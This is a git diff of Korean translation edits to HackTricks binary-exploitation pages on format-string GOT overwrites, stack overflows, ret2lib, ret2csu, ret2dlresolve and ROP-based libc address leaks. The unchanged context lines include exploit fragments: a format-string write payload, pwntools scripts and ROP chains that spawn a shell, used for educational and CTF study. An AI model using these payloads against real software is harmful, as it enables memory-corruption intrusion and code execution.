 이 예제에서 목표는 **GOT** 테이블의 **함수**의 **주소**를 **덮어쓰는 것**입니다. 이 함수는 나중에 호출될 것입니다. 비록 이것이 다른 임의 쓰기를 악용하여 exec 기술을 사용할 수 있지만:
 
@@ -92,12 +92,12 @@ AAAA.%500\$08x —> Param at offset 500
 {{#endref}}
 
 우리는 **사용자**로부터 **인수**를 **받는** **함수**를 **덮어쓰고**, 이를 **`system`** **함수**를 가리키도록 할 것입니다.\
-언급했듯이 주소를 쓰기 위해 일반적으로 2단계가 필요합니다: 먼저 주소의 2바이트를 쓰고, 그 다음에 나머지 2바이트를 씁니다. 이를 위해 **`$hn`**이 사용됩니다.
+앞서 언급했듯이 주소를 쓰기 위해서는 일반적으로 2단계가 필요합니다: 먼저 주소의 2바이트를 쓰고, 그 다음에 나머지 2바이트를 씁니다. 이를 위해 **`$hn`**이 사용됩니다.
 
 - **HOB**는 주소의 2개의 높은 바이트를 호출합니다.
 - **LOB**는 주소의 2개의 낮은 바이트를 호출합니다.
 
-그런 다음, 포맷 문자열의 작동 방식 때문에 \[HOB, LOB] 중에서 **먼저 가장 작은 것을 써야** 하고, 그 다음에 나머지를 써야 합니다.
+그런 다음, 포맷 문자열의 작동 방식 때문에 **먼저 더 작은** \[HOB, LOB]를 작성한 다음 다른 것을 작성해야 합니다.
 
 HOB < LOB\
 `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`
@@ -117,7 +117,7 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "
 format-strings-template.md
 {{#endref}}
 
-또는 [**여기**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)에서 이 기본 예제를 확인할 수 있습니다:
+또는 [**여기**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)에서 이 기본 예제를 확인하세요:
 ```python
 from pwn import *
 
@@ -141,10 +141,10 @@ p.interactive()
 - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
 - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
 - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html)
-- 32비트, no relro, no canary, nx, no pie, 스택에서 플래그를 누출하기 위한 format strings의 기본 사용 (실행 흐름을 변경할 필요 없음)
+- 32비트, relro 없음, canary 없음, nx, pie 없음, 스택에서 플래그를 누출하기 위한 format strings의 기본 사용 (실행 흐름을 변경할 필요 없음)
 - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
-- 32비트, relro, no canary, nx, no pie, `fflush` 주소를 win 함수로 덮어쓰는 format string (ret2win)
+- 32비트, relro, canary 없음, nx, pie 없음, `fflush`의 주소를 win 함수로 덮어쓰는 format string (ret2win)
 - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
-- 32비트, relro, no canary, nx, no pie, `.fini_array` 내 main의 주소를 쓰기 위한 format string (흐름이 한 번 더 루프하도록) 및 GOT 테이블에서 `system`의 주소를 `strlen`을 가리키도록 쓰기. 흐름이 main으로 돌아가면, `strlen`이 사용자 입력으로 실행되고 `system`을 가리키면, 전달된 명령이 실행된다.
+- 32비트, relro, canary 없음, nx, pie 없음, `.fini_array`의 main 내부에 주소를 쓰기 위한 format string (그래서 흐름이 한 번 더 루프됨) 및 `strlen`을 가리키는 GOT 테이블의 `system`에 주소를 씀. 흐름이 main으로 돌아가면, `strlen`이 사용자 입력으로 실행되고 `system`을 가리키면, 전달된 명령이 실행됨.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
index 499c26c10..dbac129f2 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md
@@ -4,7 +4,7 @@
 
 ## 기본 정보
 
-[**One Gadget**](https://github.com/david942j/one_gadget)는 **system**과 **"/bin/sh"** 대신에 쉘을 얻을 수 있게 해줍니다. **One Gadget**은 libc 라이브러리 내에서 단 하나의 **주소**를 사용하여 쉘을 얻는 방법(`execve("/bin/sh")`)을 찾습니다.\
+[**One Gadget**](https://github.com/david942j/one_gadget)는 **system**과 **"/bin/sh"** 대신에 셸을 얻을 수 있게 해줍니다. **One Gadget**은 libc 라이브러리 내에서 단 하나의 **주소**를 사용하여 셸을 얻는 방법(`execve("/bin/sh")`)을 찾습니다.\
 그러나 일반적으로 몇 가지 제약이 있으며, 가장 일반적이고 피하기 쉬운 제약은 `[rsp+0x30] == NULL`입니다. **RSP** 내부의 값을 제어하므로 제약을 피하기 위해 추가적인 NULL 값을 보내기만 하면 됩니다.
 
 ![](<../../images/image (615).png>)
@@ -15,6 +15,6 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100
 One Gadget가 지시하는 주소에 **`libc`가 로드된 기본 주소를 추가해야 합니다.**
 
 > [!TIP]
-> One Gadget는 **임의 쓰기 2 실행 기술**에 **큰 도움이 되며**, 단 하나의 주소만 호출하면 되므로 **ROP 체인을 단순화할 수 있습니다** (요구 사항을 충족해야 함). 
+> One Gadget는 **임의 쓰기 2 실행 기술**에 **큰 도움이 되며**, 단 하나의 주소만 호출하면 되므로 **ROP 체인을 단순화**할 수 있습니다 (요구 사항을 충족해야 함). 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
index 55b88906c..af5190d47 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
@@ -4,12 +4,12 @@
 
 ## 스택 오버플로우란 무엇인가
 
-**스택 오버플로우**는 프로그램이 할당된 것보다 더 많은 데이터를 스택에 기록할 때 발생하는 취약점입니다. 이 초과 데이터는 **인접한 메모리 공간을 덮어쓰게** 되어 유효한 데이터의 손상, 제어 흐름의 중단, 그리고 잠재적으로 악성 코드의 실행으로 이어질 수 있습니다. 이 문제는 종종 입력에 대한 경계 검사를 수행하지 않는 안전하지 않은 함수의 사용으로 인해 발생합니다.
+**스택 오버플로우**는 프로그램이 할당된 것보다 더 많은 데이터를 스택에 기록할 때 발생하는 취약점입니다. 이 초과 데이터는 **인접한 메모리 공간을 덮어쓰게** 되어 유효한 데이터의 손상, 제어 흐름의 중단, 그리고 잠재적으로 악성 코드의 실행을 초래할 수 있습니다. 이 문제는 종종 입력에 대한 경계 검사를 수행하지 않는 안전하지 않은 함수의 사용으로 인해 발생합니다.
 
-이 덮어쓰기의 주요 문제는 **저장된 명령 포인터 (EIP/RIP)**와 **저장된 베이스 포인터 (EBP/RBP)**가 이전 함수로 돌아가기 위해 **스택에 저장**되기 때문입니다. 따라서 공격자는 이를 덮어쓰고 **프로그램의 실행 흐름을 제어**할 수 있습니다.
+이 덮어쓰기의 주요 문제는 **저장된 명령 포인터 (EIP/RIP)**와 **저장된 베이스 포인터 (EBP/RBP)**가 이전 함수로 돌아가기 위해 **스택에 저장**된다는 것입니다. 따라서 공격자는 이를 덮어쓰고 **프로그램의 실행 흐름을 제어**할 수 있습니다.
 
 취약점은 일반적으로 함수가 **스택에 할당된 양보다 더 많은 바이트를 복사할 때** 발생하여 스택의 다른 부분을 덮어쓸 수 있게 됩니다.\
-이와 관련된 일반적인 취약 함수로는 `strcpy`, `strcat`, `sprintf`, `gets` 등이 있습니다... 또한, 길이 인수를 받는 `fgets`나 `read`와 같은 함수는 지정된 길이가 할당된 것보다 클 경우 취약하게 사용될 수 있습니다.
+이와 같은 취약점이 있는 일반적인 함수는: `strcpy`, `strcat`, `sprintf`, `gets`... 또한, 길이 인수를 사용하는 `fgets`나 `read`와 같은 함수는 지정된 길이가 할당된 것보다 클 경우 취약하게 사용될 수 있습니다.
 
 예를 들어, 다음 함수들이 취약할 수 있습니다:
 ```c
@@ -22,11 +22,11 @@ printf("You entered: %s\n", buffer);
 ```
 ### 스택 오버플로우 찾기
 
-스택 오버플로우를 찾는 가장 일반적인 방법은 `A`s의 매우 큰 입력을 주는 것입니다 (예: `python3 -c 'print("A"*1000)'`) 그리고 **주소 `0x41414141`에 접근하려고 시도했다는** 것을 나타내는 `Segmentation Fault`를 기대하는 것입니다.
+스택 오버플로우를 찾는 가장 일반적인 방법은 `A`의 매우 큰 입력을 주는 것입니다 (예: `python3 -c 'print("A"*1000)'`) 그리고 **주소 `0x41414141`에 접근하려고 시도했다는** `Segmentation Fault`를 기대하는 것입니다.
 
-게다가, 스택 오버플로우 취약점이 발견되면 **리턴 주소를 덮어쓸 수 있는 오프셋**을 찾아야 합니다. 이를 위해 일반적으로 **De Bruijn 수열**이 사용됩니다. 주어진 크기 _k_의 알파벳과 길이 _n_의 부분 수열에 대해, **길이 **_**n**_**의 모든 가능한 부분 수열이 정확히 한 번씩 나타나는** **순환 수열**입니다.
+게다가, 스택 오버플로우 취약점이 발견되면 **리턴 주소를 덮어쓸 수 있는 오프셋**을 찾아야 합니다. 이를 위해 일반적으로 **De Bruijn 시퀀스**가 사용됩니다. 주어진 크기 _k_의 알파벳과 길이 _n_의 부분 수열에 대해, **길이 **_**n**_**의 모든 가능한 부분 수열이 정확히 한 번씩 나타나는 순환 시퀀스**입니다.
 
-이렇게 하면 EIP를 제어하는 데 필요한 오프셋을 수동으로 파악할 필요 없이 이러한 수열 중 하나를 패딩으로 사용하고, 그 패딩을 덮어쓴 바이트의 오프셋을 찾을 수 있습니다.
+이렇게 하면 EIP를 제어하는 데 필요한 오프셋을 수동으로 파악할 필요 없이 이러한 시퀀스 중 하나를 패딩으로 사용하고, 그것을 덮어쓴 바이트의 오프셋을 찾을 수 있습니다.
 
 이를 위해 **pwntools**를 사용할 수 있습니다:
 ```python
@@ -50,13 +50,13 @@ pattern search $rsp #Search the offset given the content of $rsp
 ## 스택 오버플로우 악용
 
 오버플로우가 발생하는 동안(오버플로우 크기가 충분히 큰 경우) 스택 내의 지역 변수 값을 덮어쓸 수 있으며, 저장된 EBP/RBP 및 EIP/RIP에 도달할 때까지 계속할 수 있습니다.\
-이러한 유형의 취약점을 악용하는 가장 일반적인 방법은 **반환 주소를 수정하는 것**으로, 함수가 끝날 때 **제어 흐름이 사용자가 지정한 포인터로 리디렉션됩니다**.
+이러한 유형의 취약점을 악용하는 가장 일반적인 방법은 **반환 주소를 수정하는 것**으로, 함수가 끝날 때 **제어 흐름이 사용자가 지정한 위치로 리디렉션됩니다**.
 
 그러나 다른 시나리오에서는 **스택 내의 일부 변수 값을 덮어쓰는 것**만으로도 악용이 충분할 수 있습니다(예: 쉬운 CTF 챌린지에서).
 
 ### Ret2win
 
-이러한 유형의 CTF 챌린지에서는 **결코 호출되지 않는** **함수**가 **바이너리 내에 존재하며, 이를 호출해야 승리할 수 있습니다**. 이러한 챌린지에서는 **반환 주소를 덮어쓸 오프셋**을 찾고 **호출할 함수의 주소**를 찾아야 합니다(보통 [**ASLR**](../common-binary-protections-and-bypasses/aslr/)이 비활성화되어 있음) 그래서 취약한 함수가 반환될 때 숨겨진 함수가 호출됩니다:
+이러한 유형의 CTF 챌린지에서는 **결코 호출되지 않는** **함수**가 **바이너리 내부에 존재하며, 이를 호출해야 승리할 수 있습니다**. 이러한 챌린지에서는 **반환 주소를 덮어쓸 오프셋**을 찾고 **호출할 함수의 주소**를 찾아야 합니다(보통 [**ASLR**](../common-binary-protections-and-bypasses/aslr/)이 비활성화되어 있음) 그래서 취약한 함수가 반환될 때 숨겨진 함수가 호출됩니다:
 
 {{#ref}}
 ret2win.md
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
index 074f7e233..99e2dfa8f 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md
@@ -6,7 +6,7 @@
 
 함수 호출이 스택에 위치한 문자열의 주소를 사용할 경우, 버퍼 오버플로우를 악용하여 **이 주소를 덮어쓰고** **이진 파일 내의 다른 문자열의 주소**를 넣을 수 있습니다.
 
-예를 들어, **`system`** 함수 호출이 **명령을 실행하기 위해 문자열의 주소를 사용할 경우**, 공격자는 **스택에 다른 문자열의 주소**인 **`export PATH=.:$PATH`**를 배치하고 현재 디렉토리에 **새 문자열의 첫 글자 이름을 가진 스크립트**를 생성할 수 있습니다. 이는 이진 파일에 의해 실행됩니다.
+예를 들어, **`system`** 함수 호출이 **명령을 실행하기 위해 문자열의 주소를 사용할 경우**, 공격자는 **스택에 다른 문자열의 주소**를 배치할 수 있으며, **`export PATH=.:$PATH`**를 사용하여 현재 디렉토리에 **새 문자열의 첫 글자 이름을 가진 스크립트**를 생성할 수 있습니다. 이 스크립트는 이진 파일에 의해 실행됩니다.
 
 다음에서 이 예제를 찾을 수 있습니다:
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
index 65c7ebe44..c85cc6e8a 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
@@ -40,7 +40,7 @@ call qword [r15 + rbx*8];
 여기서 **ret2csu**가 등장합니다:
 
 1. **레지스터 설정**: 첫 번째 매직 가젯을 사용하여 스택에서 값을 꺼내 rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), r15에 저장합니다.
-2. **두 번째 가젯 사용**: 이러한 레지스터가 설정되면 두 번째 가젯을 사용합니다. 이를 통해 선택한 값을 `rdx`와 `rsi`(각각 r14와 r13에서)로 이동시켜 함수 호출을 위한 매개변수를 준비합니다. 또한 `r15`와 `rbx`를 제어함으로써 프로그램이 계산한 주소에 있는 함수를 호출하도록 만들 수 있습니다. 이 주소는 `[r15 + rbx*8]`에 배치됩니다.
+2. **두 번째 가젯 사용**: 이러한 레지스터가 설정되면 두 번째 가젯을 사용합니다. 이를 통해 선택한 값을 `rdx`와 `rsi` (각각 r14와 r13에서)로 이동시켜 함수 호출을 위한 매개변수를 준비합니다. 또한, `r15`와 `rbx`를 제어함으로써 프로그램이 계산한 주소에 있는 함수를 호출하도록 만들 수 있습니다. 이 주소는 `[r15 + rbx*8]`에 배치됩니다.
 
 이 기술을 사용한 [**예시와 설명이 여기에 있습니다**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), 그리고 이것이 사용된 최종 익스플로잇입니다:
 ```python
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
index 09b39d56a..5af53fbe2 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
@@ -25,9 +25,9 @@
 
 ## Attack Summary
 
-1. 가짜 구조체를 어딘가에 작성합니다.
+1. 가짜 구조체를 어딘가에 작성
 2. system의 첫 번째 인수 설정 (`$rdi = &'/bin/sh'`)
-3. **`_dl_runtime_resolve`**를 호출하기 위해 스택에 구조체의 주소를 설정합니다.
+3. **`_dl_runtime_resolve`**를 호출하기 위해 스택에 구조체의 주소 설정
 4. **Call** `_dl_runtime_resolve`
 5. **`system`**이 해결되고 `'/bin/sh'`를 인수로 호출됩니다.
 
@@ -55,7 +55,7 @@ p.sendline(dlresolve.payload)    # now the read is called and we pass all the re
 
 p.interactive()
 ```
-## 참고 문헌
+## 참고문헌
 
 - [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared)
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve)
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
index ca8c53ee0..3d83ecf53 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
@@ -4,11 +4,11 @@
 
 ## **Ret2esp**
 
-**ESP(스택 포인터)는 항상 스택의 맨 위를 가리키기 때문에**, 이 기술은 EIP(명령 포인터)를 **`jmp esp`** 또는 **`call esp`** 명령의 주소로 교체하는 것을 포함합니다. 이렇게 하면 셸코드가 덮어쓴 EIP 바로 뒤에 배치됩니다. `ret` 명령이 실행되면 ESP는 다음 주소를 가리키며, 정확히 셸코드가 저장된 위치입니다.
+**ESP(스택 포인터)가 항상 스택의 맨 위를 가리키기 때문에**, 이 기술은 EIP(명령 포인터)를 **`jmp esp`** 또는 **`call esp`** 명령의 주소로 교체하는 것을 포함합니다. 이렇게 하면 셸코드가 덮어쓴 EIP 바로 뒤에 배치됩니다. `ret` 명령이 실행되면 ESP는 다음 주소를 가리키며, 정확히 셸코드가 저장된 위치입니다.
 
-**주소 공간 배치 무작위화(ASLR)**가 Windows나 Linux에서 활성화되지 않은 경우, 공유 라이브러리에서 발견된 `jmp esp` 또는 `call esp` 명령을 사용할 수 있습니다. 그러나 [**ASLR**](../common-binary-protections-and-bypasses/aslr/)가 활성화된 경우, 이러한 명령을 찾기 위해 취약한 프로그램 자체를 살펴봐야 할 수도 있습니다(그리고 [**PIE**](../common-binary-protections-and-bypasses/pie/)를 우회해야 할 수도 있습니다).
+**주소 공간 배치 무작위화(ASLR)**가 Windows 또는 Linux에서 활성화되지 않은 경우, 공유 라이브러리에서 발견된 `jmp esp` 또는 `call esp` 명령을 사용할 수 있습니다. 그러나 [**ASLR**](../common-binary-protections-and-bypasses/aslr/)가 활성화된 경우, 이러한 명령을 찾기 위해 취약한 프로그램 자체를 살펴봐야 할 수도 있습니다(그리고 [**PIE**](../common-binary-protections-and-bypasses/pie/)를 우회해야 할 수도 있습니다).
 
-게다가 EIP 손상 이후에 셸코드를 배치할 수 있는 것은, 함수의 작동 중에 실행되는 `push` 또는 `pop` 명령이 셸코드에 간섭하지 않도록 보장합니다. 셸코드가 함수의 스택 중간에 배치되면 이러한 간섭이 발생할 수 있습니다.
+게다가 EIP 손상 이후에 셸코드를 배치할 수 있는 것은, 스택의 중간이 아닌, 함수의 작동 중에 실행되는 `push` 또는 `pop` 명령이 셸코드에 간섭하지 않도록 보장합니다. 셸코드가 함수의 스택 중간에 배치되었다면 이러한 간섭이 발생할 수 있습니다.
 
 ### 공간 부족
 
@@ -52,7 +52,7 @@ p.interactive()
 ## 보호 조치
 
 - [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): 스택이 실행 가능하지 않다면, 셸코드를 스택에 배치하고 실행하기 위해 점프해야 하므로 도움이 되지 않습니다.
-- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): 이러한 보호 조치는 esp 또는 다른 레지스터로 점프할 명령어를 찾기 어렵게 만들 수 있습니다.
+- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): 이러한 보호 조치는 esp 또는 다른 레지스터로 점프할 수 있는 명령어를 찾기 어렵게 만들 수 있습니다.
 
 ## 참고 문헌
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
index 4216b0200..6a2f61e7b 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md
@@ -9,7 +9,7 @@
 ### **예시 단계 (단순화)**
 
 - 호출할 함수의 주소(예: system)와 호출할 명령(예: /bin/sh)의 주소를 가져옵니다.
-- 첫 번째 인수로 명령 문자열을 가리키고 실행 흐름을 함수로 전달하는 ROP 체인을 생성합니다.
+- 첫 번째 인수로 명령 문자열을 가리키고 함수로의 실행 흐름을 전달하는 ROP 체인을 생성합니다.
 
 ## 주소 찾기
 
@@ -21,7 +21,7 @@ libc의 주소가 ASLR에 의해 변경되고 있는지 확인하려면 다음
 ```bash
 for i in `seq 0 20`; do ldd ./<bin> | grep libc; done
 ```
-- 사용된 libc를 알면 `system` 함수의 오프셋을 다음과 같이 찾을 수 있습니다:
+- 사용된 libc를 알면 `system` 함수의 오프셋을 찾는 것도 가능합니다:
 ```bash
 readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
 ```
@@ -39,17 +39,17 @@ find "/bin/sh"
 ```
 ### /proc/\<PID>/maps 사용하기
 
-프로세스가 **자식** 프로세스를 생성할 때마다 (네트워크 서버) 해당 파일을 **읽어보세요** (아마도 root 권한이 필요할 것입니다).
+프로세스가 **자식** 프로세스를 생성할 때마다 대화하는 경우(네트워크 서버) 해당 파일을 **읽어보세요**(아마도 root 권한이 필요할 것입니다).
 
-여기에서 프로세스 내에서 **libc가 로드된 정확한 위치**와 **각 자식 프로세스에 대해 로드될 위치**를 찾을 수 있습니다.
+여기에서 프로세스 내에서 **libc가 로드된 정확한 위치**와 프로세스의 모든 자식 프로세스에 대해 **어디에 로드될 것인지**를 찾을 수 있습니다.
 
 ![](<../../../../images/image (95).png>)
 
-이 경우 **0xb75dc000**에 로드됩니다 (이것이 libc의 기본 주소가 됩니다).
+이 경우 **0xb75dc000**에 로드됩니다(이것이 libc의 기본 주소가 됩니다).
 
 ## 알 수 없는 libc
 
-이진 파일이 로드하는 **libc를 모를 수도 있습니다** (서버에 위치해 있어 접근할 수 없을 수 있습니다). 그런 경우 취약점을 악용하여 **주소를 유출하고 어떤 libc** 라이브러리가 사용되고 있는지 찾을 수 있습니다:
+이진 파일이 로드하는 **libc를 모를 수도 있습니다**(서버에 접근할 수 없기 때문에). 그런 경우 취약점을 악용하여 **주소를 유출하고 어떤 libc** 라이브러리가 사용되고 있는지 찾을 수 있습니다:
 
 {{#ref}}
 rop-leaking-libc-address/
@@ -63,13 +63,13 @@ rop-leaking-libc-address/rop-leaking-libc-template.md
 
 ## 32비트에서 ASLR 우회하기
 
-이러한 무작위 대입 공격은 **32비트 시스템에만 유용합니다**.
+이러한 무작위 공격은 **32비트 시스템에만 유용합니다**.
 
-- 익스플로잇이 로컬인 경우, libc의 기본 주소를 무작위 대입하여 시도할 수 있습니다 (32비트 시스템에 유용함):
+- 익스플로잇이 로컬인 경우 libc의 기본 주소를 무작위로 추측해 볼 수 있습니다(32비트 시스템에 유용함):
 ```python
 for off in range(0xb7000000, 0xb8000000, 0x1000):
 ```
-- 원격 서버를 공격하는 경우, **`usleep` `libc` 함수의 주소를 brute-force 시도할 수 있습니다**, 예를 들어 인수로 10을 전달합니다. 만약 어느 시점에서 **서버가 응답하는 데 10초가 추가로 걸린다면**, 이 함수의 주소를 찾은 것입니다.
+- 원격 서버를 공격하는 경우, **`usleep` `libc` 함수의 주소를 brute-force 시도할 수 있습니다**, 인수로 10을 전달합니다 (예:). 만약 어느 시점에서 **서버가 응답하는 데 10초가 추가로 걸린다면**, 이 함수의 주소를 찾은 것입니다.
 
 ## One Gadget
 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
index 38a9446a1..41c4688e8 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md
@@ -58,7 +58,7 @@ r.sendline(payload)
 #cyclic_find(0x6161616b) # Find the offset of those bytes
 return
 ```
-**실행** `python template.py` 하면 프로그램이 충돌하는 GDB 콘솔이 열립니다. 그 **GDB 콘솔** 안에서 `x/wx $rsp`를 실행하여 RIP를 덮어쓸 **바이트**를 가져옵니다. 마지막으로 **파이썬** 콘솔을 사용하여 **오프셋**을 가져옵니다:
+**실행** `python template.py` 하면 프로그램이 충돌하는 GDB 콘솔이 열립니다. 그 **GDB 콘솔** 안에서 `x/wx $rsp`를 실행하여 RIP를 덮어쓸 **바이트**를 가져옵니다. 마지막으로 **python** 콘솔을 사용하여 **오프셋**을 가져옵니다:
 ```python
 from pwn import *
 cyclic_find(0x6161616b)
@@ -84,7 +84,7 @@ log.info("Puts plt: " + hex(PUTS_PLT))
 log.info("pop rdi; ret  gadget: " + hex(POP_RDI))
 ```
 `PUTS_PLT`는 **함수 puts**를 호출하는 데 필요합니다.\
-`MAIN_PLT`는 **오버플로우**를 **다시** **악용**하기 위해 상호작용 후 **메인 함수**를 다시 호출하는 데 필요합니다 (무한한 악용 라운드). **각 ROP의 끝에서 프로그램을 다시 호출하는 데 사용됩니다**.\
+`MAIN_PLT`는 **오버플로우**를 **다시** **공격**하기 위해 한 번의 상호작용 후에 **main 함수**를 다시 호출하는 데 필요합니다(무한 반복 공격). **각 ROP의 끝에서 프로그램을 다시 호출하는 데 사용됩니다**.\
 **POP_RDI**는 호출된 함수에 **매개변수**를 **전달**하는 데 필요합니다.
 
 이 단계에서는 pwntools가 실행 중에 모든 것을 찾기 때문에 아무것도 실행할 필요가 없습니다.
@@ -124,12 +124,12 @@ p.interactive()
 ```python
 rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 ```
-이것은 **RIP**를 **덮어쓰기**할 수 있을 때까지 몇 바이트를 보낼 것입니다: `OFFSET`.\
-그런 다음, **주소**를 `POP_RDI` 가젯으로 설정하여 다음 주소(`FUNC_GOT`)가 **RDI** 레지스트리에 저장되도록 합니다. 이는 우리가 **puts를 호출**하고 **PUTS_GOT**의 **주소**를 메모리에서 puts 함수의 주소로 전달하고자 하기 때문입니다.\
-그 후, `PUTS_PLT`가 호출될 것입니다(여기서 **RDI** 안에 `PUTS_GOT`이 있습니다) 그래서 puts는 `PUTS_GOT` 안의 **내용**을 **읽고** (**메모리에서 puts 함수의 주소**) **출력**할 것입니다.\
+이것은 **RIP**를 **덮어쓰기** 할 수 있을 때까지 몇 바이트를 보낼 것입니다: `OFFSET`.\
+그런 다음, **주소**를 `POP_RDI` 가젯으로 설정하여 다음 주소(`FUNC_GOT`)가 **RDI** 레지스트리에 저장되도록 합니다. 이는 우리가 **puts를 호출**하고 **주소**를 `PUTS_GOT`로 전달하기를 원하기 때문입니다. puts 함수의 메모리 주소는 `PUTS_GOT`가 가리키는 주소에 저장됩니다.\
+그 후, `PUTS_PLT`가 호출될 것입니다( **RDI** 안에 `PUTS_GOT`가 포함됨) 그래서 puts는 `PUTS_GOT` 안의 **내용**을 **읽고** (**메모리에서 puts 함수의 주소**) **출력**할 것입니다.\
 마지막으로, **main 함수가 다시 호출**되어 우리는 오버플로우를 다시 이용할 수 있습니다.
 
-이렇게 우리는 **puts 함수를 속여** **메모리**에서 **puts** 함수의 **주소**를 **출력**하게 만들었습니다(이는 **libc** 라이브러리 안에 있습니다). 이제 그 주소를 알았으니 **어떤 libc 버전이 사용되고 있는지 검색**할 수 있습니다.
+이렇게 해서 우리는 **puts 함수를 속여** **메모리**에서 **puts** 함수의 **주소**를 **출력**하게 했습니다(이는 **libc** 라이브러리 안에 있습니다). 이제 그 주소를 알았으니 **어떤 libc 버전이 사용되고 있는지 검색**할 수 있습니다.
 
 ![](<../../../../../images/image (141).png>)
 
@@ -139,7 +139,7 @@ rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 ### 3.1- libc 버전 검색 (1)
 
 웹 페이지에서 어떤 라이브러리가 사용되고 있는지 검색할 수 있습니다: [https://libc.blukat.me/](https://libc.blukat.me)\
-이곳에서는 발견된 **libc** 버전을 다운로드할 수도 있습니다.
+이것은 또한 발견된 **libc** 버전을 다운로드할 수 있게 해줍니다.
 
 ![](<../../../../../images/image (142).png>)
 
@@ -157,13 +157,13 @@ rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
 - Libc 심볼 이름: `puts`
 - 유출된 libc 주소: `0x7ff629878690`
 
-우리는 어떤 **libc**가 사용되고 있는지 알아낼 수 있습니다.
+우리는 어떤 **libc**가 가장 가능성이 높은지 알아낼 수 있습니다.
 ```bash
 ./find puts 0x7ff629878690
 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
 archive-glibc (id libc6_2.23-0ubuntu11_amd64)
 ```
-우리는 2개의 일치를 얻습니다 (첫 번째가 작동하지 않으면 두 번째를 시도해야 합니다). 첫 번째 것을 다운로드하세요:
